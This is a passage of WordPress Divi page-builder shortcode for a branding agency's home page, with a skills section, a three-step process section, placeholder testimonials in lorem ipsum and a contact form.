to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>\n[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" width=\"98.9%\" custom_margin=\"|||21px||\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner _builder_version=\"4.4.9\" width=\"74.5%\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"4.4.9\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" width=\"95.7%\" custom_margin=\"|||21px||\"]<p><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" 